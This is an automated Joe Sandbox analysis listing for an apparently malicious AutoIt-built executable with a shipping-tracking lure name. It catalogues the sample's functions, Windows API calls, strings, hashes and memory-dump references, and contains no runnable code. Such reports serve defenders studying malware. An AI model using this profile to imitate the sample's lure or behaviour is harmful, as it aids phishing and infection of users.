                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Combobox
                                      • API String ID: 3850602802-2096851135
                                      • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                      • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                      • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                      • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                      Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: LengthMessageSendTextWindow
                                      • String ID: edit
                                      • API String ID: 2978978980-2167791130
                                      • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                      • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                      • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                      • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                      Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 00476CB0
                                      • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: GlobalMemorySleepStatus
                                      • String ID: @
                                      • API String ID: 2783356886-2766056989
                                      • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                      • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                      • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                      • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                      Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: htonsinet_addr
                                      • String ID: 255.255.255.255
                                      • API String ID: 3832099526-2422070025
                                      • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                      • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                      • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                      • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                      Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID: <local>
                                      • API String ID: 2038078732-4266983199
                                      • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                      • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                      • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                      • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                      Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __fread_nolock_memmove
                                      • String ID: EA06
                                      • API String ID: 1988441806-3962188686
                                      • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                      • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                      • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                      • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                      Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: u,D
                                      • API String ID: 4104443479-3858472334
                                      • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                      • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                      • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                      • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                      Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • wsprintfW.USER32 ref: 0045612A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend_mallocwsprintf
                                      • String ID: %d/%02d/%02d
                                      • API String ID: 1262938277-328681919
                                      • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                      • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                      • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                      • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                      Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetCloseHandle.WININET(?), ref: 00442663
                                      • InternetCloseHandle.WININET ref: 00442668
                                        • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CloseHandleInternet$ObjectSingleWait
                                      • String ID: aeB
                                      • API String ID: 857135153-906807131
                                      • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                      • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                      • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                      • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                      Function 00433244 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, xrefs: 0043324B
                                      • ^B, xrefs: 00433248
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcsncpy
                                      • String ID: ^B$C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                      • API String ID: 1735881322-1498124708
                                      • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                      • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                      • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                      • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                      Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                      • PostMessageW.USER32(00000000), ref: 00441C05
                                        • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                      • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                      • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                      • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                      Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                        • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                      • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                      • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                      • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                      Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                        • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Message_doexit
                                      • String ID: AutoIt$Error allocating memory.
                                      • API String ID: 1993061046-4017498283
                                      • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                      • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                      • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                      • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D